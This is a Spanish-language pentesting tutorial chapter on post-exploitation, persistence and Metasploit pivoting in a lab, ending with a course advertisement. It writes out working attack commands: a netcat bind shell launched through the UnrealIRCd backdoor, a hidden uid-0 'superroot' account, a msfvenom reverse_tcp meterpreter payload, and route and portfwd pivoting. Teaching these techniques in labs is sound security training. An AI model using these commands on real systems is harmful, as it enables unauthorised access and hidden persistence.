En el octavo capítulo de nuestra «Guía de Hacking y Pentesting», nos adentramos en el fascinante mundo de la post-explotación y persistencia. Exploraremos cómo los expertos en ciberseguridad mantienen el acceso, recopilan información valiosa y aseguran su presencia en sistemas comprometidos. Esta fase crucial destaca la importancia de comprender no solo el ataque, sino también las estrategias para mantener el control en un entorno comprometido.

¿Te gustaría enterarte de cuando lanzamos descuentos al Máximo o Nuevos Cursos?

Mantenimiento del acceso obtenido en el sistema objetivo.

El mantenimiento del acceso obtenido en el sistema objetivo es una fase crítica en las pruebas de penetración, donde el objetivo es asegurar la persistencia y continuidad del acceso. Aquí se describen algunas técnicas comunes utilizadas para mantener el acceso en el sistema:

1. Creación de Cuentas de Usuario Adicionales: Crear cuentas de usuario adicionales con privilegios elevados para asegurar el acceso incluso si las credenciales originales son revocadas.

2. Creación de Backdoors: Instalar backdoors en el sistema para permitir el acceso posterior incluso después de que las vulnerabilidades utilizadas inicialmente hayan sido parcheadas.

3. Programación de Tareas y Servicios: Configurar tareas programadas o servicios que se ejecuten de forma periódica para mantener el acceso persistente.

4. Uso de Malware Persistente: Implantar malware persistente que se inicie automáticamente con el sistema operativo para mantener el control del sistema.

5. Modificación de Configuraciones de Seguridad: Cambiar configuraciones de seguridad para permitir el acceso remoto o manipular configuraciones de firewall.

6. Uso de Túneles Encubiertos: Establecer túneles encubiertos o canales encubiertos para eludir la detección y mantener una comunicación encubierta.

7. Ofuscación de Actividades: Ofuscar las actividades realizadas para evitar la detección, como cambiar nombres de archivos o enmascarar comandos.

8. Uso de Certificados Maliciosos: Implementar certificados maliciosos para evadir la detección de herramientas de seguridad.

9. Uso de Canales Encubiertos en Protocolos Legítimos: Utilizar canales encubiertos en protocolos legítimos, como DNS o HTTP, para pasar desapercibido.

10. Monitorización de Cambios en el Sistema: Monitorear cambios en el sistema y ajustar las tácticas en respuesta a las actualizaciones de seguridad.

En este caso en vez de dar un o unos pocos ejemplos es tema que debemos abordar con mas profundidad. Con lo cual veremos una lista de recursos para profundizar acerca de este tema y que se pueda aprender en mayor profundidad. En esta gran recopilación de técnicas de persistencia podemos verlas mapeadas con Mitre e indicando además si se necesitan permisos o no de administrador en cada una de ellas:
 

TécnicaMitrePermisos de administrador
Winlogon Helper DLLT1004SI
Port MonitorsT1013SI
Accessibility FeaturesT1015SI
Shortcut ModificationT1023NO
Modify Existing ServiceT1031SI
DLL Search Order HijackingT1038SI
Change Default File AssociationT1042NO
New ServiceT1050SI
Scheduled TasksT1053NO
Service Registry Permission WeaknessT1058NO
Registry Run KeysT1060NO
WMI Event SubscriptionT1084SI
Security Support ProviderT1101SI
AppInit DLLsT1103SI
Component Object Model HijackingT1122NO
Netsh Helper DLLT1128SI
Office Application StartupT1137NO
Application ShimmingT1138SI
ScreensaverT1180NO
Image File Execution Options InjectionT1183SI
BITS JobsT1197NO
Time ProvidersT1209SI
PowerShell ProfileT1504NO
WaitforN/ASI
RID HijackingN/ASI

Uso de backdoors y herramientas de persistencia.

El uso de backdoors y herramientas de persistencia es una técnica común en pruebas de penetración, pero es esencial comprender que estas acciones deben llevarse a cabo de manera ética y legal, con el consentimiento explícito del propietario del sistema. Aquí se describen algunas técnicas comunes relacionadas con backdoors y persistencia:

Los backdoors son mecanismos ocultos que permiten el acceso no autorizado al sistema incluso después de que se hayan corregido las vulnerabilidades iniciales. Técnicas:

Inyección de Código: Insertar código malicioso en aplicaciones o scripts existentes para crear una puerta trasera.

Creación de Cuentas de Usuario Adicionales: Crear cuentas de usuario adicionales con privilegios elevados para garantizar el acceso persistente.

2. Herramientas de Persistencia: Estas herramientas se utilizan para mantener el acceso continuo al sistema, automatizando la ejecución de comandos o acciones específicas. Ejemplos de Herramientas:

PowerShell Empire: Permite la creación de agentes persistentes y automatiza la ejecución de comandos.

Covenant: Similar a PowerShell Empire, proporciona una plataforma para la creación de backdoors y la automatización de acciones.

Consideraciones Importantes:

Requisito: Obtener el consentimiento explícito del propietario del sistema antes de utilizar backdoors o herramientas de persistencia.

Uso Responsable: Limitar el uso de backdoors y herramientas de persistencia a lo estrictamente necesario para los fines de la prueba de penetración.

Documentación Detallada: Documentar meticulosamente la creación y el uso de backdoors, así como las herramientas de persistencia empleadas.

Seguimiento Transparente: Comunicar de manera transparente con el cliente o el propietario del sistema sobre las acciones realizadas, incluyendo la implementación de backdoors y herramientas de persistencia.

Eliminación Responsable: Eliminar todas las backdoors y herramientas de persistencia al finalizar las pruebas de penetración, asegurándose de no dejar puntos de acceso no autorizados.

Evitar Daño No Autorizado: Evitar causar daño no autorizado al sistema, los datos o la integridad del entorno durante la utilización de backdoors y herramientas de persistencia.

Es crucial recordar que la implementación de backdoors y herramientas de persistencia debe realizarse con el único propósito de mejorar la seguridad del sistema y ayudar en la mitigación de vulnerabilidades. La conducta ética y la transparencia son fundamentales en todas las etapas de las pruebas de penetración.

backdoors deUnrealIRCd  y persistencia en Metasploitable 2

UnrealIRCd es un servidor IRC Open Source. En el mes de noviembre del año 2009 el archivo de nombre “Unreal3.2.8.1.tar.gz” fue reemplazado por una versión conteniendo una puerta trasera (troyano). Esta puerta trasera permitía a cualquier persona ejecutar diversos comandos con los privilegios del usuario ejecutando ircd. La puerta trasera era ejecutada sin importar las restricciones del usuario. Para la siguiente práctica se utilizaremos, como siempre, Metasploitable 2 y Kali Linux.

Centramos la atención en el servicio IRC del puerto TCP 6667.

Utilizaremos el Script NSE de nombre “irc-unrealircd-backdoor.nse” incluida en Nmap, el cual permite verificar si este servidor IRC contiene la puerta trasera.

nmap -n -Pn -p 6667 --script=irc-unrealircd-backdoor.nse 192.168.1.49

El argumento de nombre «irc-unrealircd-backdoor.command» del script, puede ser utilizado para ejecutar comandos arbitrarios en el sistema remoto. Debido a la naturaleza de esta vulnerabilidad (El resultado nunca es devuelto) no se tiene manera de obtener la salida del comando.

nmap -n -Pn -p 6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -l -p 7777 -e /bin/sh' 192.168.1.49

Desde otra terminal se utiliza la herramienta netcat para establecer una conexión hacia el puerto TCP 7777.

# nc -n -vv 192.168.1.49 7777
Uname -a

La conexión se ha establecido correctamente. Y ya se tiene acceso en el objetivo de evaluación con los privilegios del usuario root. Completando el punto anterior podemos crear un user root para mantener nuestra persistencia.

useradd -o --uid 0 superroot

Herramientas para actividades

Para mantener el acceso, incluso después de reinicios y cierres, se necesita establecer una forma de persistencia. Estas herramientas pueden ayudar:

  • SharPyShell – Un shell obfuscado y altamente personalizable que es útil para mantener la persistencia.
  • SharpStay – Esta herramienta permite la persistencia a través de la creación de tareas programadas.
  • SharpEventPersist – Un script que se utiliza para la persistencia a través de la suscripción a eventos de Windows.
  • PowerShell Empire: Permite la creación de agentes persistentes y automatiza la ejecución de comandos.
  • Covenant: Similar a PowerShell Empire, proporciona una plataforma para la creación de backdoors y la automatización de acciones.
  • Veil-Evasion es una herramienta que crea payloads ofuscados para eludir la detección de antivirus y puede utilizarse para establecer persistencia.
  • Beacon (Cobalt Strike): Beacon es una herramienta integrada en Cobalt Strike que permite a los actores de amenazas mantener el acceso persistente y controlar sistemas comprometidos.
  • Meterpreter (Metasploit): Meterpreter, un módulo de Metasploit, proporciona funcionalidades avanzadas para el acceso y control persistente en sistemas comprometidos.

Responder es una herramienta que puede ser utilizada para realizar ataques de tipo «LLMNR/NBT-NS Spoofing» y obtener credenciales, lo que puede contribuir a la persistencia.

Recuerda que el conocimiento y uso de estas herramientas deben alinearse con prácticas éticas y legales, y solo deben ser empleadas en entornos controlados con permisos adecuados.

Recopilación de información adicional y movimiento lateral 

La recopilación de información adicional y el movimiento lateral son fases fundamentales en las pruebas de penetración, pero es esencial realizarlas de manera ética y legal, con el consentimiento explícito del propietario del sistema.

  • Enumeración de Red: Utilizar herramientas como Nmap o Nessus para escanear y enumerar activos en la red.
  • Reconocimiento Activo: Utilizar herramientas como DNSenum para recopilar información sobre el dominio y sus subdominios.
  • Búsqueda de Información en Fuentes Públicas: Investigar fuentes públicas, como redes sociales y sitios web, para recopilar información sobre empleados y la infraestructura.

Movimiento Lateral: 

Desplazarse lateralmente a través de la red, moviéndose de un sistema comprometido a otro, buscando oportunidades de escalada de privilegios.

  • Uso de Credenciales Robadas: Utilizar credenciales robadas para autenticarse en otros sistemas y ampliar el alcance del acceso.
  • Ataques de Pas-the-Ticket (PtT) o Pas-the-Hash (PtH): Utilizar tickets de Kerberos o hashes de contraseñas para autenticarse en otros sistemas sin conocer la contraseña real.
  • Ataques a Protocolos débiles: Explotar debilidades en protocolos como SMB para movimientos laterales.

Pivoting en Metasploit

El pivoting: el proceso de acceder a redes a las que no tenemos acceso en circunstancias normales mediante el uso de computadoras comprometidas. Como punto de partida necesitaremos tener acceso a una máquina comprometida en la red objetivo, dependiendo de la configuración del equipo de la víctima, es posible que necesitemos o no tener root o privilegios de administrador.

En las primeras fases de escaneo de un pentesting debemos intentar recopilar la mayor cantidad de información posible sobre las redes internas disponibles en la empresa. Muchas organizaciones dividen sus departamentos en segmentos de red o redes locales virtuales (VLANs), donde se alojan determinadas máquinas, en muchos casos los equipos que forman parte de una red tienen configuradas varias interfaces ya sean físicas o lógicas hacia estas otras redes. En este tipo de circunstancias podemos aprovecharnos de esto para pivotar entre equipos de distintas redes y poder encontrar uno o varios equipos ya sean clientes o servidores con posibles vulnerabilidades explotables.

Para poner en práctica estas técnicas realizaremos un taller completo en el que mostraremos dos escenarios muy similares: lab 1 y lab 2, con el fin de que se vea el concepto de pivoting entre máquinas que formen parte de otras redes distintas en las que desde un principio no tendríamos una visibilidad directa hacia ellas desde la máquina en la que realizamos la auditoría del test de intrusión. El nivel de pivoting de estos escenarios será simple, de un solo salto, entre una máquina comprometida a otra. Dependiendo la topología de red de la organización se podría complicar más, con más saltos entre máquinas para ir descubriendo las posibles redes internas existentes, pero la finalidad, el concepto y las técnicas de pivoting seguirían siendo las mismas.

En el siguiente escenario se mostrará un entorno formado por tres máquinas:

  • Kali: 10.0.0.1/24. (Máquina A)
  • Ubuntu: 10.0.0.10/24 y 11.0.0.1/24. (Máquina B)
  • Linux (Apache http): 11.0.0.10/24. (Máquina C)

Desde VirtualBox la configuración de las redes es así:

Creamos una NAT desde herramientas.

Kali tiene un adaptador puente

Linux tiene una NAT

Ubuntu tiene:

Adaptador 1: Adaptador puente

Adaptador 2: Red Nat

La máquina Kali con Metasploit Framework será desde donde realizaremos la intrusión. Tiene dos interfaces de red, una en modo NAT (eth1 simplemente para tener salida a Internet) y eth0 con la IP asignada 10.0.0.1 que forma parte de la red 10.0.0.0/24. Esta máquina no tiene visibilidad directa con la segunda red 11.0.0.0/24.

La máquina Ubuntu tiene dos interfaces la cual tiene visibilidad con la red 10.0.0.0/24 y 11.0.0.0/24 será el pivoting y la segunda máquina Linux con una sola interface con la ip asignada 11.0.0.10 que tendrá visibilidad para la red 11.0.0.0.0/24, esta será una posible máquina vulnerable ya que dispondrá de un servicio web Apache a la que tendremos que intentar llegar desde la máquina Kali.

Establecer una sesión Meterpreter en la máquina Ubuntu (pivoting)

El funcionamiento de los tipos de pivoting dentro de las posibilidades que nos ofrece Metasploit Framework debemos partir de la obtención de una sesión Meterpreter en uno de los equipos de la red, en este caso será el Ubuntu en el cual tiene visibilidad con las dos redes dentro de este laboratorio, esta será la máquina que nos hará de pivoting a las redes que tenga configuradas. Para este escenario podemos generar con msfvenom un payload en el que su shellcode será un meterpreter linux y ejecutarlo en la máquina remota para obtener dicha sesión.

msfvenom -p Linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -b ‘\x00\x0a\x0d’ -o payload

-b ‘\x00\x0a\x0d’: (–bad-chars) Parámetro en el que se le puede especificar una lista de caracteres a evitar, de modo que no provoque un posible error en el momento de ejecutar el payload. En este caso estos opcodes serían válido

Route

Una vez tenemos una sesión establecida con la máquina Ubuntu, iniciamos el meterpreter y una forma de comprobar las redes asociadas es listar las interfaces de red con ipconfig para comprobar si existe alguna dirección IP asignada que forme parte de otro segmento de red distinto. También podríamos ejecutar una shell dentro de meterpreter y consultar la tabla de rutas con el comando route print. Como vemos se muestra la red 10.0.0.0/24 en la interface 2 y la 11.0.0.0/24 en la interface 3.

Route es un comando que nos permitirá encaminar tráfico de red dentro de Metasploit, diciéndole que desde cualquier módulo todo el tráfico que queramos llevar hacia otra red lo haga a través del identificador de una sesión establecida que tengamos activa, por ejemplo con un Meterpreter.

Salimos de la sesión de meterpreter y la dejamos en segundo plano saliendo con el comando background. Fuera de meterpreter y sabiendo que la máquina Ubuntu tiene dos redes configuradas, hacemos uso del comando route para añadir la visibilidad de esta nueva red a nivel de Metasploit.

route add <network> <netmask> <session_id>
route add 11.0.0.0 255.255.255.0 1

Con esto le estaremos diciendo que todo el tráfico que se produzca dentro de Metasploit con destino a la red 11.0.0.0/24 lo enrute a través de la sesión con ID 1 donde está el meterpreter. Con route print dentro de Metasploit podemos ver las rutas asignadas y con route -h veremos la ayuda completa.

De esta forma ya podremos pivotar a través de la máquina Ubuntu a la red 11.0.0.0/24 realizando un escaneo completo hacia esa red.

En el siguiente ejemplo y para ahorrar tiempo en esta demo delimitaremos un pool de direcciones IP de la red 11.0.0.0/24 comprobando únicamente el puerto 80. Vemos que encontramos una dirección 10.0.0.10 que tiene el puerto 80 abierto.

En un descubrimiento habitual podríamos usar el módulo «auxiliary/scanner/discovery/arp_sweep» para encontrar hosts activos en la red local a través de solicitudes arp y también «auxiliary/scanner/portscan/ack» para comprobar que puertos se están filtrado.

Con lo anterior ya se demostró que podemos realizar un sondeo y tener acceso a redes pivotando a través de la máquina Ubuntu donde tenemos la sesión meterpreter hacia una máquina Linux con la ip 11.0.0.10.

Ya hemos descubierto que el puerto 80 está abierto por lo que es probable que se trate de un servicio web, podemos ahora comprobar la versión de ese servicio http a través del módulo «auxiliary/scanner/http/http_version«. A partir de ahí podríamos buscar en Internet si existe alguna vulnerabilidad conocida y explotable para versión y continuar el test de intrusión.

Autoroute (Módulo post)

Otra forma de establecer rutas es hacerlo de forma automática. Una vez que tenemos una sesión establecida podemos hacer uso del módulo «post/multi/manage/autoroute«, establecemos el ID de sesión y lo ejecutamos.

Esto hará un barrido en el equipo donde tenemos establecida la sesión para intentar reconocer otras redes asociadas a esa máquina y las agregará automáticamente a nuestra tabla de rutas de Metasploit. Es lo mismo que lo comentado anteriormente pero de forma automática sin necesidad de consultar manualmente a través de meterpreter las tablas de rutas asociadas a la máquina comprometida.

portfwd (Port Forwarding)

portfwd realiza un reenvío de puertos -port forwarding- entre máquinas. Podemos canalizar todo el tráfico que enviamos a un puerto local a la escucha de nuestra máquina A a un puerto e IP de una máquina C en la que no tenemos a priori conectividad, configurando esta IP y puerto de reenvío en una máquina B en la que si tenemos una conectividad directa.

Una ventaja de esto es que todas las peticiones que hagamos al puerto local de la máquina A esta las reenviará a la máquina C pasando por la máquina B, si analizamos el tráfico desde la máquina C veremos que esas peticiones llegan desde la máquina B y no desde la máquina A que inicialmente origina las peticiones. Como esto en un primer momento puede resultar un poco confuso mostraremos un ejemplo.

Basándonos en el mismo escenario visito hasta ahora lab 1. Desde la máquina Kali (máquina A) nos intentamos conectar a la máquina Linux al puerto 22 (máquina C), que sabemos que está abierto, y vemos que no podemos conectarnos directamente ya que desde la máquina Kali no tenemos visibilidad hacia la red 11.0.0.0/24.

Sin embargo desde la sesión 1 donde tenemos nuestro meterpreter de la máquina Ubuntu (máquina B) esta si tiene visibilidad con la red 11.0.0.0/24 donde está máquina Linux (máquina C). Desde el meterpreter de la sesión 1 agregamos una nueva regla de reenvío de puertos.

portfwd add -l <local_port> -p <remote_port> -r <remote_host>
portfwd add -l 9500 -p 22 -r 11.0.0.10

Con esto indicamos que todas las peticiones que hagamos al puerto local de la máquina A Kali sen reenviadas al puerto 22 de la ip 11.0.0.10 que será la máquina C Linux. Siendo la máquina B Ubuntu quien haga el reenvío de puertos entre la máquina A y C. De ahí que todo el tráfico que llegue a la máquina C Linux es como si lo realizase la máquina B Ubuntu cuando en realidad lo envía la máquina A Kali.

Comprobando nuevamente el intento de conexión vemos como ahora desde Metasploit Framework como desde la propia máquina local Kali podemos llegar a la máquina C Linux estableciendo una conexión localhost hacia le puerto local a la escucha.

Si listamos los puertos a la escucha de la máquina local vemos como fuera del MSF tenemos el puerto 9500 a la escucha. Esto puede ser útil en los casos en los que necesitemos utilizar servicios web u otras herramientas fuera de Metasploit para poder escanear, vulnerar o realizar acciones hacia una máquina remota en la que no tendríamos un acceso directo pero si conocemos su IP y puerto y tenemos una máquina que usaremos de pivoting en medio de la comunicación para realizar los reenvíos de puertos. Tener en cuenta que podemos agregar más de una regla port forwarding.

La forma de usar módulos dentro de Metasploit con reglas configuradas de reenvío de puertos es solamente por medio de conexiones locales (ip y puerto local). En el siguiente ejemplo se muestran dos reglas port forwarding establecidas en la sesión 1 (máquina B Ubuntu), la segunda regla indica que las peticiones que se realicen hacia el puerto 9000 desde cualquier interface de la máquina Kali A se reenvíen a través de la sesión 2 (máquina B Ubuntu) hacia la IP destino 11.0.0.10 puerto 80 que será la máquina C Linux.

RHOST: será la dirección local de la máquina A Kali, ip 127.0.0.1 (y no la ip 11.0.0.10 de la máquina destino C Linux).

PORTS: será el puerto local a la escucha en la máquina A Kali, puerto 9000 (y no el puerto 80 de la máquina destino C Linux).

Vemos como nos indica que el puerto 9000 de la ip 127.0.0.1 está Open. Esto significa que la regla de reenvío funcionó y que realmente esa IP/Puerto local corresponderían a la IP/Puerto destino configurado en la regla del portfwd. Fuera de Metasploit podemos consultar los puertos a la escucha con netstat y comprobar que tanto el puerto 9500, visto en el ejemplo anterior, como el puerto 9000 están a la escucha por un proceso ruby que sería Metasploit.

¿Diferencias entre route y portfwd en Metasploit?

Route y Autoroute

  • Es necesario tener una sesión establecida.
  • Agrega direcciones de red completas indicando su notación CIDR.
  • Las tablas de rutas solo se agregan a nivel funcional de Metasploit Framework.
  • Dentro de Metasploit se pueden usar todos los módulos de forma directa hacia las redes agregadas.
  • Con el módulo post Autorute se pueden descubrir y agregar rutas de red de forma automática de una sesión previamente establecida.

Portfwd

  • Es necesario tener una sesión establecida.
  • No pueden agregar direcciones completas de red, solo se crean reglas de port forwarding hacía una IP/Puerto específico.
  • Se pueden usar otras herramientas fuera de Metasploit a nivel local de la propia máquina Kali IP/Puerto locales estarán a la escucha.
  • Dentro de Metasploit se pueden usar módulos hacia la IP/Puerto de la regla creada, la IP/Puerto será interpretado de forma local desde la propia máquina Kali.

Conclusión:

Al finalizar este capítulo, hemos desglosado las tácticas avanzadas de post-explotación y persistencia en el ámbito del Hacking y Pentesting. Desde la recopilación silenciosa de datos hasta la creación de backdoors seguras, cada acción realizada durante la post-explotación es estratégica y cuidadosamente ejecutada. Recordemos que con gran poder viene una mayor responsabilidad; la persistencia ética es esencial para fortalecer las defensas digitales y proteger la integridad de los sistemas.

Si has querido mejorar tus habilidades en seguridad cibernética pero nunca lo has logrado, ahora es definitivamente el momento de dar el siguiente paso. Considera nuestro curso Universidad Hacking. Todo en Ciberseguridad. Curso Completo con una excelente relación calidad-precio ¡Desarrolla tus habilidades cibernéticas y avanza en tu carrera!

Universidad Hacking. Todo en Ciberseguridad. Curso Completo

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí: https://achirou.com/universidad

El Hacking Ético y Ciberseguridad es Transversal a todo lo que sea Tecnología. Es decir, cualquier dispositivo inteligente, sea Celular, Computadora, o hasta hoy un Vehículo, debe haber Seguridad informática.

¿Esto que significa?

Que hoy más que nunca, se necesitan personas capacitadas en este rubro para trabajar.

Por esa razón cree esta formación profesional para compartirte mis conocimientos y experiencia en la materia y puedas iniciar en este mundo del Hacking Ético y Ciberseguridad.

Te voy a estar acompañando en el proceso de aprendizaje, donde si estas empezando desde 0, sin conocimientos previos, no es un impedimento ya que iniciaremos como si no supieras nada de la materia.

Y si sos una persona con conocimientos, podrás iniciar directamente en el nivel más avanzado o en el que tu elijas.

Como en todos mis cursos en udemy, tendrás muchísima practica para que materialices lo que vas aprendiendo.

Yo soy Álvaro Chirou, tengo más de 20 Años de experiencia trabajando en Tecnología, eh dado disertaciones en eventos internacionales como OWASP, tengo más de 500.000 estudiantes en Udemy y 100 formaciones profesionales impartidas en la misma.

Empieza a aprender ya mismo!

Recuerda que tienes Acceso de por vida al curso y recibirás las actualizaciones que se hagan sobre el mismo.

Lo que aprenderás

  • Aprende Seguridad informática
  • Te enseñare Hacking Ético
  • Veremos Ciberseguridad
  • La base principal del Hacking, Redes
  • Esto es alternativo que puedes aprender, Programación (python)
  • Necesitaras saber Python para, Hacking con Python
  • Te enseñare Análisis de Malware, además haremos laboratorios, practicas y ejecutaremos Malware para que veas su comportamiento
  • Te enseñare a reforzar tu Privacidad y Anonimato
  • Aprenderás una de las herramientas mas populares por excelencia en el mundo del Hacking, Metasploit
  • Es importante que aprendas Seguridad informática Mobile ya que usamos nuestro celular como una PC
  • Veremos también el top 10 de Owasp Web
  • Veremos también el top 10 de Owasp mobile
  • Veremos también el top 10 de Owasp API
  • Ante la demanda del mercado, te enseñare Seguridad informática para empresas
  • Veras también la suit de herramientas de seguridad informática en un sistema operativo, Kali Linux
  • Herramientas de hacking para el celular en Termux
  • Seguridad informática en WordPress
  • Análisis de trafico en Wireshark

Aprende Hacking Ético y Ciberseguridad sin necesitar conocimientos Previos. Practica Hacking Ético y Ciberseguridad aquí: https://achirou.com/universidad

¿Te gustaría enterarte de cuando lanzamos descuentos al Máximo o Nuevos Cursos?